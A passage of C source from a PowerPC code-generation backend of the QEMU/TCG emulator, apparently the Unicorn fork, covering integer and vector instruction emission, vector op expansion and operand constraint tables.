TCG_TYPE_I64, CNTTZD, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_ctpop_i64: tcg_out32(s, CNTPOPD | SAB(args[1], args[0], 0)); break; case INDEX_op_mul_i32: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out32(s, MULLI | TAI(a0, a1, a2)); } else { tcg_out32(s, MULLW | TAB(a0, a1, a2)); } break; case INDEX_op_div_i32: tcg_out32(s, DIVW | TAB(args[0], args[1], args[2])); break; case INDEX_op_divu_i32: tcg_out32(s, DIVWU | TAB(args[0], args[1], args[2])); break; case INDEX_op_shl_i32: if (const_args[2]) { tcg_out_shli32(s, args[0], args[1], args[2]); } else { tcg_out32(s, SLW | SAB(args[1], args[0], args[2])); } break; case INDEX_op_shr_i32: if (const_args[2]) { tcg_out_shri32(s, args[0], args[1], args[2]); } else { tcg_out32(s, SRW | SAB(args[1], args[0], args[2])); } break; case INDEX_op_sar_i32: if (const_args[2]) { tcg_out32(s, SRAWI | RS(args[1]) | RA(args[0]) | SH(args[2])); } else { tcg_out32(s, SRAW | SAB(args[1], args[0], args[2])); } break; case INDEX_op_rotl_i32: if (const_args[2]) { tcg_out_rlw(s, RLWINM, args[0], args[1], args[2], 0, 31); } else { tcg_out32(s, RLWNM | SAB(args[1], args[0], args[2]) | MB(0) | ME(31)); } break; case INDEX_op_rotr_i32: if (const_args[2]) { tcg_out_rlw(s, RLWINM, args[0], args[1], 32 - args[2], 0, 31); } else { tcg_out32(s, SUBFIC | TAI(TCG_REG_R0, args[2], 32)); tcg_out32(s, RLWNM | SAB(args[1], args[0], TCG_REG_R0) | MB(0) | ME(31)); } break; case INDEX_op_brcond_i32: tcg_out_brcond(s, args[2], args[0], args[1], const_args[1], arg_label(args[3]), TCG_TYPE_I32); break; case INDEX_op_brcond_i64: tcg_out_brcond(s, args[2], args[0], args[1], const_args[1], arg_label(args[3]), TCG_TYPE_I64); break; case INDEX_op_brcond2_i32: tcg_out_brcond2(s, args, const_args); break; case INDEX_op_neg_i32: case INDEX_op_neg_i64: tcg_out32(s, NEG | RT(args[0]) | RA(args[1])); break; case INDEX_op_not_i32: case INDEX_op_not_i64: tcg_out32(s, NOR | SAB(args[1], args[0], args[1])); break; case INDEX_op_add_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { do_addi_64: tcg_out_mem_long(s, ADDI, ADD, a0, a1, a2); } else { tcg_out32(s, ADD | TAB(a0, a1, a2)); } break; case INDEX_op_sub_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[1]) { if (const_args[2]) { tcg_out_movi(s, TCG_TYPE_I64, a0, a1 - a2); } else { tcg_out32(s, SUBFIC | TAI(a0, a2, a1)); } } else if (const_args[2]) { a2 = -a2; goto do_addi_64; } else { tcg_out32(s, SUBF | TAB(a0, a2, a1)); } break; case INDEX_op_shl_i64: if (const_args[2]) { tcg_out_shli64(s, args[0], args[1], args[2]); } else { tcg_out32(s, SLD | SAB(args[1], args[0], args[2])); } 
break; case INDEX_op_shr_i64: if (const_args[2]) { tcg_out_shri64(s, args[0], args[1], args[2]); } else { tcg_out32(s, SRD | SAB(args[1], args[0], args[2])); } break; case INDEX_op_sar_i64: if (const_args[2]) { int sh = SH(args[2] & 0x1f) | (((args[2] >> 5) & 1) << 1); tcg_out32(s, SRADI | RA(args[0]) | RS(args[1]) | sh); } else { tcg_out32(s, SRAD | SAB(args[1], args[0], args[2])); } break; case INDEX_op_rotl_i64: if (const_args[2]) { tcg_out_rld(s, RLDICL, args[0], args[1], args[2], 0); } else { tcg_out32(s, RLDCL | SAB(args[1], args[0], args[2]) | MB64(0)); } break; case INDEX_op_rotr_i64: if (const_args[2]) { tcg_out_rld(s, RLDICL, args[0], args[1], 64 - args[2], 0); } else { tcg_out32(s, SUBFIC | TAI(TCG_REG_R0, args[2], 64)); tcg_out32(s, RLDCL | SAB(args[1], args[0], TCG_REG_R0) | MB64(0)); } break; case INDEX_op_mul_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out32(s, MULLI | TAI(a0, a1, a2)); } else { tcg_out32(s, MULLD | TAB(a0, a1, a2)); } break; case INDEX_op_div_i64: tcg_out32(s, DIVD | TAB(args[0], args[1], args[2])); break; case INDEX_op_divu_i64: tcg_out32(s, DIVDU | TAB(args[0], args[1], args[2])); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, false); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, true); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, false); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, true); break; case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: c = EXTSB; goto gen_ext; case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: c = EXTSH; goto gen_ext; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: c = EXTSW; goto gen_ext; gen_ext: tcg_out32(s, c | RS(args[1]) | RA(args[0])); break; case INDEX_op_extu_i32_i64: tcg_out_ext32u(s, args[0], args[1]); break; case INDEX_op_setcond_i32: tcg_out_setcond(s, TCG_TYPE_I32, args[3], args[0], args[1], args[2], const_args[2]); break; case INDEX_op_setcond_i64: tcg_out_setcond(s, TCG_TYPE_I64, args[3], args[0], args[1], args[2], const_args[2]); break; case INDEX_op_setcond2_i32: tcg_out_setcond2(s, args, const_args); break; case INDEX_op_bswap16_i32: case INDEX_op_bswap16_i64: a0 = args[0], a1 = args[1]; /* a1 = abcd */ if (a0 != a1) { /* a0 = (a1 r<< 24) & 0xff # 000c */ tcg_out_rlw(s, RLWINM, a0, a1, 24, 24, 31); /* a0 = (a0 & ~0xff00) | (a1 r<< 8) & 0xff00 # 00dc */ tcg_out_rlw(s, RLWIMI, a0, a1, 8, 16, 23); } else { /* r0 = (a1 r<< 8) & 0xff00 # 00d0 */ tcg_out_rlw(s, RLWINM, TCG_REG_R0, a1, 8, 16, 23); /* a0 = (a1 r<< 24) & 0xff # 000c */ tcg_out_rlw(s, RLWINM, a0, a1, 24, 24, 31); /* a0 = a0 | r0 # 00dc */ tcg_out32(s, OR | SAB(TCG_REG_R0, a0, a0)); } break; case INDEX_op_bswap32_i32: case INDEX_op_bswap32_i64: /* Stolen from gcc's builtin_bswap32 */ a1 = args[1]; a0 = args[0] == a1 ? 
TCG_REG_R0 : args[0]; /* a1 = args[1] # abcd */ /* a0 = rotate_left (a1, 8) # bcda */ tcg_out_rlw(s, RLWINM, a0, a1, 8, 0, 31); /* a0 = (a0 & ~0xff000000) | ((a1 r<< 24) & 0xff000000) # dcda */ tcg_out_rlw(s, RLWIMI, a0, a1, 24, 0, 7); /* a0 = (a0 & ~0x0000ff00) | ((a1 r<< 24) & 0x0000ff00) # dcba */ tcg_out_rlw(s, RLWIMI, a0, a1, 24, 16, 23); if (a0 == TCG_REG_R0) { tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); } break; case INDEX_op_bswap64_i64: a0 = args[0], a1 = args[1], a2 = TCG_REG_R0; if (a0 == a1) { a0 = TCG_REG_R0; a2 = a1; } /* a1 = # abcd efgh */ /* a0 = rl32(a1, 8) # 0000 fghe */ tcg_out_rlw(s, RLWINM, a0, a1, 8, 0, 31); /* a0 = dep(a0, rl32(a1, 24), 0xff000000) # 0000 hghe */ tcg_out_rlw(s, RLWIMI, a0, a1, 24, 0, 7); /* a0 = dep(a0, rl32(a1, 24), 0x0000ff00) # 0000 hgfe */ tcg_out_rlw(s, RLWIMI, a0, a1, 24, 16, 23); /* a0 = rl64(a0, 32) # hgfe 0000 */ /* a2 = rl64(a1, 32) # efgh abcd */ tcg_out_rld(s, RLDICL, a0, a0, 32, 0); tcg_out_rld(s, RLDICL, a2, a1, 32, 0); /* a0 = dep(a0, rl32(a2, 8), 0xffffffff) # hgfe bcda */ tcg_out_rlw(s, RLWIMI, a0, a2, 8, 0, 31); /* a0 = dep(a0, rl32(a2, 24), 0xff000000) # hgfe dcda */ tcg_out_rlw(s, RLWIMI, a0, a2, 24, 0, 7); /* a0 = dep(a0, rl32(a2, 24), 0x0000ff00) # hgfe dcba */ tcg_out_rlw(s, RLWIMI, a0, a2, 24, 16, 23); if (a0 == 0) { tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); } break; case INDEX_op_deposit_i32: if (const_args[2]) { uint32_t mask = ((2u << (args[4] - 1)) - 1) << args[3]; tcg_out_andi32(s, args[0], args[0], ~mask); } else { tcg_out_rlw(s, RLWIMI, args[0], args[2], args[3], 32 - args[3] - args[4], 31 - args[3]); } break; case INDEX_op_deposit_i64: if (const_args[2]) { uint64_t mask = ((2ull << (args[4] - 1)) - 1) << args[3]; tcg_out_andi64(s, args[0], args[0], ~mask); } else { tcg_out_rld(s, RLDIMI, args[0], args[2], args[3], 64 - args[3] - args[4]); } break; case INDEX_op_extract_i32: tcg_out_rlw(s, RLWINM, args[0], args[1], 32 - args[2], 32 - args[3], 31); break; case INDEX_op_extract_i64: tcg_out_rld(s, RLDICL, args[0], args[1], 64 - args[2], 64 - args[3]); break; case INDEX_op_movcond_i32: tcg_out_movcond(s, TCG_TYPE_I32, args[5], args[0], args[1], args[2], args[3], args[4], const_args[2]); break; case INDEX_op_movcond_i64: tcg_out_movcond(s, TCG_TYPE_I64, args[5], args[0], args[1], args[2], args[3], args[4], const_args[2]); break; #if TCG_TARGET_REG_BITS == 64 case INDEX_op_add2_i64: #else case INDEX_op_add2_i32: #endif /* Note that the CA bit is defined based on the word size of the environment. So in 64-bit mode it's always carry-out of bit 63. The fallback code using deposit works just as well for 32-bit. */ a0 = args[0], a1 = args[1]; if (a0 == args[3] || (!const_args[5] && a0 == args[5])) { a0 = TCG_REG_R0; } if (const_args[4]) { tcg_out32(s, ADDIC | TAI(a0, args[2], args[4])); } else { tcg_out32(s, ADDC | TAB(a0, args[2], args[4])); } if (const_args[5]) { tcg_out32(s, (args[5] ? ADDME : ADDZE) | RT(a1) | RA(args[3])); } else { tcg_out32(s, ADDE | TAB(a1, args[3], args[5])); } if (a0 != args[0]) { tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); } break; #if TCG_TARGET_REG_BITS == 64 case INDEX_op_sub2_i64: #else case INDEX_op_sub2_i32: #endif a0 = args[0], a1 = args[1]; if (a0 == args[5] || (!const_args[3] && a0 == args[3])) { a0 = TCG_REG_R0; } if (const_args[2]) { tcg_out32(s, SUBFIC | TAI(a0, args[4], args[2])); } else { tcg_out32(s, SUBFC | TAB(a0, args[4], args[2])); } if (const_args[3]) { tcg_out32(s, (args[3] ? 
SUBFME : SUBFZE) | RT(a1) | RA(args[5])); } else { tcg_out32(s, SUBFE | TAB(a1, args[5], args[3])); } if (a0 != args[0]) { tcg_out_mov(s, TCG_TYPE_REG, args[0], a0); } break; case INDEX_op_muluh_i32: tcg_out32(s, MULHWU | TAB(args[0], args[1], args[2])); break; case INDEX_op_mulsh_i32: tcg_out32(s, MULHW | TAB(args[0], args[1], args[2])); break; case INDEX_op_muluh_i64: tcg_out32(s, MULHDU | TAB(args[0], args[1], args[2])); break; case INDEX_op_mulsh_i64: tcg_out32(s, MULHD | TAB(args[0], args[1], args[2])); break; case INDEX_op_mb: tcg_out_mb(s, args[0]); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } } int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece) { switch (opc) { case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: case INDEX_op_not_vec: return 1; case INDEX_op_orc_vec: return have_isa_2_07; case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_smax_vec: case INDEX_op_smin_vec: case INDEX_op_umax_vec: case INDEX_op_umin_vec: case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: return vece <= MO_32 || have_isa_2_07; case INDEX_op_ssadd_vec: case INDEX_op_sssub_vec: case INDEX_op_usadd_vec: case INDEX_op_ussub_vec: return vece <= MO_32; case INDEX_op_cmp_vec: case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: return vece <= MO_32 || have_isa_2_07 ? -1 : 0; case INDEX_op_neg_vec: return vece >= MO_32 && have_isa_3_00; case INDEX_op_mul_vec: switch (vece) { case MO_8: case MO_16: return -1; case MO_32: return have_isa_2_07 ? 1 : -1; } return 0; case INDEX_op_bitsel_vec: return have_vsx; default: return 0; } } static bool tcg_out_dup_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg dst, TCGReg src) { tcg_debug_assert(dst >= TCG_REG_V0); /* Splat from integer reg allowed via constraints for v3.00. */ if (src < TCG_REG_V0) { tcg_debug_assert(have_isa_3_00); switch (vece) { case MO_64: tcg_out32(s, MTVSRDD | VRT(dst) | RA(src) | RB(src)); return true; case MO_32: tcg_out32(s, MTVSRWS | VRT(dst) | RA(src)); return true; default: /* Fail, so that we fall back on either dupm or mov+dup. */ return false; } } /* * Recall we use (or emulate) VSX integer loads, so the integer is * right justified within the left (zero-index) double-word. 
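     * Hence the fixed element numbers in the splats below
     * (explanatory note): with big-endian element numbering, that
     * right-justified value sits in byte 7 for MO_8, halfword 3 for
     * MO_16, and word 1 for MO_32.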
*/ switch (vece) { case MO_8: tcg_out32(s, VSPLTB | VRT(dst) | VRB(src) | (7 << 16)); break; case MO_16: tcg_out32(s, VSPLTH | VRT(dst) | VRB(src) | (3 << 16)); break; case MO_32: tcg_out32(s, VSPLTW | VRT(dst) | VRB(src) | (1 << 16)); break; case MO_64: if (have_vsx) { tcg_out32(s, XXPERMDI | VRT(dst) | VRA(src) | VRB(src)); break; } tcg_out_vsldoi(s, TCG_VEC_TMP1, src, src, 8); tcg_out_vsldoi(s, dst, TCG_VEC_TMP1, src, 8); break; default: g_assert_not_reached(); } return true; } static bool tcg_out_dupm_vec(TCGContext *s, TCGType type, unsigned vece, TCGReg out, TCGReg base, intptr_t offset) { int elt; tcg_debug_assert(out >= TCG_REG_V0); switch (vece) { case MO_8: if (have_isa_3_00) { tcg_out_mem_long(s, LXV, LVX, out, base, offset & -16); } else { tcg_out_mem_long(s, 0, LVEBX, out, base, offset); } elt = extract32(offset, 0, 4); #ifndef HOST_WORDS_BIGENDIAN elt ^= 15; #endif tcg_out32(s, VSPLTB | VRT(out) | VRB(out) | (elt << 16)); break; case MO_16: tcg_debug_assert((offset & 1) == 0); if (have_isa_3_00) { tcg_out_mem_long(s, LXV | 8, LVX, out, base, offset & -16); } else { tcg_out_mem_long(s, 0, LVEHX, out, base, offset); } elt = extract32(offset, 1, 3); #ifndef HOST_WORDS_BIGENDIAN elt ^= 7; #endif tcg_out32(s, VSPLTH | VRT(out) | VRB(out) | (elt << 16)); break; case MO_32: if (have_isa_3_00) { tcg_out_mem_long(s, 0, LXVWSX, out, base, offset); break; } tcg_debug_assert((offset & 3) == 0); tcg_out_mem_long(s, 0, LVEWX, out, base, offset); elt = extract32(offset, 2, 2); #ifndef HOST_WORDS_BIGENDIAN elt ^= 3; #endif tcg_out32(s, VSPLTW | VRT(out) | VRB(out) | (elt << 16)); break; case MO_64: if (have_vsx) { tcg_out_mem_long(s, 0, LXVDSX, out, base, offset); break; } tcg_debug_assert((offset & 7) == 0); tcg_out_mem_long(s, 0, LVX, out, base, offset & -16); tcg_out_vsldoi(s, TCG_VEC_TMP1, out, out, 8); elt = extract32(offset, 3, 1); #ifndef HOST_WORDS_BIGENDIAN elt = !elt; #endif if (elt) { tcg_out_vsldoi(s, out, out, TCG_VEC_TMP1, 8); } else { tcg_out_vsldoi(s, out, TCG_VEC_TMP1, out, 8); } break; default: g_assert_not_reached(); } return true; } static void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args) { static const uint32_t add_op[4] = { VADDUBM, VADDUHM, VADDUWM, VADDUDM }, sub_op[4] = { VSUBUBM, VSUBUHM, VSUBUWM, VSUBUDM }, neg_op[4] = { 0, 0, VNEGW, VNEGD }, eq_op[4] = { VCMPEQUB, VCMPEQUH, VCMPEQUW, VCMPEQUD }, ne_op[4] = { VCMPNEB, VCMPNEH, VCMPNEW, 0 }, gts_op[4] = { VCMPGTSB, VCMPGTSH, VCMPGTSW, VCMPGTSD }, gtu_op[4] = { VCMPGTUB, VCMPGTUH, VCMPGTUW, VCMPGTUD }, ssadd_op[4] = { VADDSBS, VADDSHS, VADDSWS, 0 }, usadd_op[4] = { VADDUBS, VADDUHS, VADDUWS, 0 }, sssub_op[4] = { VSUBSBS, VSUBSHS, VSUBSWS, 0 }, ussub_op[4] = { VSUBUBS, VSUBUHS, VSUBUWS, 0 }, umin_op[4] = { VMINUB, VMINUH, VMINUW, VMINUD }, smin_op[4] = { VMINSB, VMINSH, VMINSW, VMINSD }, umax_op[4] = { VMAXUB, VMAXUH, VMAXUW, VMAXUD }, smax_op[4] = { VMAXSB, VMAXSH, VMAXSW, VMAXSD }, shlv_op[4] = { VSLB, VSLH, VSLW, VSLD }, shrv_op[4] = { VSRB, VSRH, VSRW, VSRD }, sarv_op[4] = { VSRAB, VSRAH, VSRAW, VSRAD }, mrgh_op[4] = { VMRGHB, VMRGHH, VMRGHW, 0 }, mrgl_op[4] = { VMRGLB, VMRGLH, VMRGLW, 0 }, muleu_op[4] = { VMULEUB, VMULEUH, VMULEUW, 0 }, mulou_op[4] = { VMULOUB, VMULOUH, VMULOUW, 0 }, pkum_op[4] = { VPKUHUM, VPKUWUM, 0, 0 }, rotl_op[4] = { VRLB, VRLH, VRLW, VRLD }; TCGType type = vecl + TCG_TYPE_V64; TCGArg a0 = args[0], a1 = args[1], a2 = args[2]; uint32_t insn; switch (opc) { case INDEX_op_ld_vec: tcg_out_ld(s, type, a0, a1, a2); return; 
case INDEX_op_st_vec: tcg_out_st(s, type, a0, a1, a2); return; case INDEX_op_dupm_vec: tcg_out_dupm_vec(s, type, vece, a0, a1, a2); return; case INDEX_op_add_vec: insn = add_op[vece]; break; case INDEX_op_sub_vec: insn = sub_op[vece]; break; case INDEX_op_neg_vec: insn = neg_op[vece]; a2 = a1; a1 = 0; break; case INDEX_op_mul_vec: tcg_debug_assert(vece == MO_32 && have_isa_2_07); insn = VMULUWM; break; case INDEX_op_ssadd_vec: insn = ssadd_op[vece]; break; case INDEX_op_sssub_vec: insn = sssub_op[vece]; break; case INDEX_op_usadd_vec: insn = usadd_op[vece]; break; case INDEX_op_ussub_vec: insn = ussub_op[vece]; break; case INDEX_op_smin_vec: insn = smin_op[vece]; break; case INDEX_op_umin_vec: insn = umin_op[vece]; break; case INDEX_op_smax_vec: insn = smax_op[vece]; break; case INDEX_op_umax_vec: insn = umax_op[vece]; break; case INDEX_op_shlv_vec: insn = shlv_op[vece]; break; case INDEX_op_shrv_vec: insn = shrv_op[vece]; break; case INDEX_op_sarv_vec: insn = sarv_op[vece]; break; case INDEX_op_and_vec: insn = VAND; break; case INDEX_op_or_vec: insn = VOR; break; case INDEX_op_xor_vec: insn = VXOR; break; case INDEX_op_andc_vec: insn = VANDC; break; case INDEX_op_not_vec: insn = VNOR; a2 = a1; break; case INDEX_op_orc_vec: insn = VORC; break; case INDEX_op_cmp_vec: switch (args[3]) { case TCG_COND_EQ: insn = eq_op[vece]; break; case TCG_COND_NE: insn = ne_op[vece]; break; case TCG_COND_GT: insn = gts_op[vece]; break; case TCG_COND_GTU: insn = gtu_op[vece]; break; default: g_assert_not_reached(); } break; case INDEX_op_bitsel_vec: tcg_out32(s, XXSEL | VRT(a0) | VRC(a1) | VRB(a2) | VRA(args[3])); return; case INDEX_op_dup2_vec: assert(TCG_TARGET_REG_BITS == 32); /* With inputs a1 = xLxx, a2 = xHxx */ tcg_out32(s, VMRGHW | VRT(a0) | VRA(a2) | VRB(a1)); /* a0 = xxHL */ tcg_out_vsldoi(s, TCG_VEC_TMP1, a0, a0, 8); /* tmp = HLxx */ tcg_out_vsldoi(s, a0, a0, TCG_VEC_TMP1, 8); /* a0 = HLHL */ return; case INDEX_op_ppc_mrgh_vec: insn = mrgh_op[vece]; break; case INDEX_op_ppc_mrgl_vec: insn = mrgl_op[vece]; break; case INDEX_op_ppc_muleu_vec: insn = muleu_op[vece]; break; case INDEX_op_ppc_mulou_vec: insn = mulou_op[vece]; break; case INDEX_op_ppc_pkum_vec: insn = pkum_op[vece]; break; case INDEX_op_ppc_rotl_vec: insn = rotl_op[vece]; break; case INDEX_op_ppc_msum_vec: tcg_debug_assert(vece == MO_16); tcg_out32(s, VMSUMUHM | VRT(a0) | VRA(a1) | VRB(a2) | VRC(args[3])); return; case INDEX_op_mov_vec: /* Always emitted via tcg_out_mov. */ case INDEX_op_dupi_vec: /* Always emitted via tcg_out_movi. */ case INDEX_op_dup_vec: /* Always emitted via tcg_out_dup_vec. */ default: g_assert_not_reached(); } tcg_debug_assert(insn != 0); tcg_out32(s, insn | VRT(a0) | VRA(a1) | VRB(a2)); } static void expand_vec_shi(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGArg imm, TCGOpcode opci) { TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); /* Splat w/bytes for xxspltib. 
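 * Vector shift instructions take their count modulo the element width,
 * so the immediate is first reduced to imm & ((8 << vece) - 1); e.g. a
 * shift of an MO_16 vector by 21 becomes 21 & 15 == 5, splat into every
 * byte lane of t1.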
*/ tcg_gen_dupi_vec(tcg_ctx, MO_8, t1, imm & ((8 << vece) - 1)); vec_gen_3(tcg_ctx, opci, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t1)); tcg_temp_free_vec(tcg_ctx, t1); } static void expand_vec_cmp(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2, TCGCond cond) { bool need_swap = false, need_inv = false; tcg_debug_assert(vece <= MO_32 || have_isa_2_07); switch (cond) { case TCG_COND_EQ: case TCG_COND_GT: case TCG_COND_GTU: break; case TCG_COND_NE: if (have_isa_3_00 && vece <= MO_32) { break; } /* fall through */ case TCG_COND_LE: case TCG_COND_LEU: need_inv = true; break; case TCG_COND_LT: case TCG_COND_LTU: need_swap = true; break; case TCG_COND_GE: case TCG_COND_GEU: need_swap = need_inv = true; break; default: g_assert_not_reached(); } if (need_inv) { cond = tcg_invert_cond(cond); } if (need_swap) { TCGv_vec t1; t1 = v1, v1 = v2, v2 = t1; cond = tcg_swap_cond(cond); } vec_gen_4(tcg_ctx, INDEX_op_cmp_vec, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2), cond); if (need_inv) { tcg_gen_not_vec(tcg_ctx, vece, v0, v0); } } static void expand_vec_mul(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2) { TCGv_vec t1 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t2 = tcg_temp_new_vec(tcg_ctx, type); TCGv_vec t3, t4; switch (vece) { case MO_8: case MO_16: vec_gen_3(tcg_ctx, INDEX_op_ppc_muleu_vec, type, vece, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2)); vec_gen_3(tcg_ctx, INDEX_op_ppc_mulou_vec, type, vece, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2)); vec_gen_3(tcg_ctx, INDEX_op_ppc_mrgh_vec, type, vece + 1, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t2)); vec_gen_3(tcg_ctx, INDEX_op_ppc_mrgl_vec, type, vece + 1, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t2)); vec_gen_3(tcg_ctx, INDEX_op_ppc_pkum_vec, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, t1)); break; case MO_32: tcg_debug_assert(!have_isa_2_07); t3 = tcg_temp_new_vec(tcg_ctx, type); t4 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_dupi_vec(tcg_ctx, MO_8, t4, -16); vec_gen_3(tcg_ctx, INDEX_op_ppc_rotl_vec, type, MO_32, tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, v2), tcgv_vec_arg(tcg_ctx, t4)); vec_gen_3(tcg_ctx, INDEX_op_ppc_mulou_vec, type, MO_16, tcgv_vec_arg(tcg_ctx, t2), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2)); tcg_gen_dupi_vec(tcg_ctx, MO_8, t3, 0); vec_gen_4(tcg_ctx, INDEX_op_ppc_msum_vec, type, MO_16, tcgv_vec_arg(tcg_ctx, t3), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t1), tcgv_vec_arg(tcg_ctx, t3)); vec_gen_3(tcg_ctx, INDEX_op_shlv_vec, type, MO_32, tcgv_vec_arg(tcg_ctx, t3), tcgv_vec_arg(tcg_ctx, t3), tcgv_vec_arg(tcg_ctx, t4)); tcg_gen_add_vec(tcg_ctx, MO_32, v0, t2, t3); tcg_temp_free_vec(tcg_ctx, t3); tcg_temp_free_vec(tcg_ctx, t4); break; default: g_assert_not_reached(); } tcg_temp_free_vec(tcg_ctx, t1); tcg_temp_free_vec(tcg_ctx, t2); } void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg a0, ...) 
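/*
 * Expands the vector ops for which tcg_can_emit_vec_op reported -1, i.e.
 * ops this backend supports only by decomposition: immediate shifts become
 * splat + variable shift, unsupported cmp conditions are swapped or
 * inverted, and MO_8/MO_16/MO_32 multiplies are built from the even/odd
 * multiply, merge and pack primitives defined above.
 */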
{ va_list va; TCGv_vec v0, v1, v2; TCGArg a2; va_start(va, a0); v0 = temp_tcgv_vec(tcg_ctx, arg_temp(a0)); v1 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); a2 = va_arg(va, TCGArg); switch (opc) { case INDEX_op_shli_vec: expand_vec_shi(tcg_ctx, type, vece, v0, v1, a2, INDEX_op_shlv_vec); break; case INDEX_op_shri_vec: expand_vec_shi(tcg_ctx, type, vece, v0, v1, a2, INDEX_op_shrv_vec); break; case INDEX_op_sari_vec: expand_vec_shi(tcg_ctx, type, vece, v0, v1, a2, INDEX_op_sarv_vec); break; case INDEX_op_cmp_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); expand_vec_cmp(tcg_ctx, type, vece, v0, v1, v2, va_arg(va, TCGArg)); break; case INDEX_op_mul_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); expand_vec_mul(tcg_ctx, type, vece, v0, v1, v2); break; default: g_assert_not_reached(); } va_end(va); } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef S_S = { .args_ct_str = { "S", "S" } }; static const TCGTargetOpDef r_ri = { .args_ct_str = { "r", "ri" } }; static const TCGTargetOpDef r_r_r = { .args_ct_str = { "r", "r", "r" } }; static const TCGTargetOpDef r_L_L = { .args_ct_str = { "r", "L", "L" } }; static const TCGTargetOpDef L_L_L = { .args_ct_str = { "L", "L", "L" } }; static const TCGTargetOpDef S_S_S = { .args_ct_str = { "S", "S", "S" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rI = { .args_ct_str = { "r", "r", "rI" } }; static const TCGTargetOpDef r_r_rT = { .args_ct_str = { "r", "r", "rT" } }; static const TCGTargetOpDef r_r_rU = { .args_ct_str = { "r", "r", "rU" } }; static const TCGTargetOpDef r_rI_ri = { .args_ct_str = { "r", "rI", "ri" } }; static const TCGTargetOpDef r_rI_rT = { .args_ct_str = { "r", "rI", "rT" } }; static const TCGTargetOpDef r_r_rZW = { .args_ct_str = { "r", "r", "rZW" } }; static const TCGTargetOpDef L_L_L_L = { .args_ct_str = { "L", "L", "L", "L" } }; static const TCGTargetOpDef S_S_S_S = { .args_ct_str = { "S", "S", "S", "S" } }; static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "ri", "rZ", "rZ" } }; static const TCGTargetOpDef dep = { .args_ct_str = { "r", "0", "rZ" } }; static const TCGTargetOpDef br2 = { .args_ct_str = { "r", "r", "ri", "ri" } }; static const TCGTargetOpDef setc2 = { .args_ct_str = { "r", "r", "r", "ri", "ri" } }; static const TCGTargetOpDef add2 = { .args_ct_str = { "r", "r", "r", "r", "rI", "rZM" } }; static const TCGTargetOpDef sub2 = { .args_ct_str = { "r", "r", "rI", "rZM", "r", "r" } }; static const TCGTargetOpDef v_r = { .args_ct_str = { "v", "r" } }; static const TCGTargetOpDef v_vr = { .args_ct_str = { "v", "vr" } }; static const TCGTargetOpDef v_v = { .args_ct_str = { "v", "v" } }; static const TCGTargetOpDef v_v_v = { .args_ct_str = { "v", "v", "v" } }; static const TCGTargetOpDef v_v_v_v = { 